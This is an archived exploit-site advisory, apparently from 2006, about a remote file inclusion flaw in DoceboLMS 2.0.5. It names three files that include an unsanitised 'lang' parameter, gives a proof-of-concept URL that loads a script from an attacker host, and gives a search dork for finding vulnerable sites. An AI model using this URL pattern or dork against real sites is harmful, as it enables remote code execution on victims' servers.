exploits , vulnerabilities , articles , DoceboLMS <= 2.0.5 (help.php) Remote File Include Vulnerability

2007-03-22 LMS <= 1.8.9 Vala Remote File Inclusion Vulnerabilities
2006-05-08 Dokeos LMS <= 1.6.4 (authldap.php) Remote File Include Exploit

2006-05-26

DoceboLMS <= 2.0.5 (help.php) Remote File Include Vulnerability

Rated as : Moderate Risk

Vulnerable Script: Docebo LMS 2.05
Discovered: beford <xbefordx gmail com>

Noobs: %22Based+on+DoceboLMS+2.0%22

Vulnerable Files

doceboLMS205/modules/credits/business.php =>
include($_GET['lang'].'/language.php');

doceboLMS205/modules/credits/credits.php =>
include($_GET['lang'].'/language.php');

doceboLMS205/modules/credits/help.php =>
include($_GET['lang'].'/language.php');

http://www.oops.org/DOCEBO205/modules/credits/help.php?lang=http://<evilh4x0rscript>/?


securitydot.net - 2006-05-26

Exploits - newest 10 RSS | More

2007-06-15 57299 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34221 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42446 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29342 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19779 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16714 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19416 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16599 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33615 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17240 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit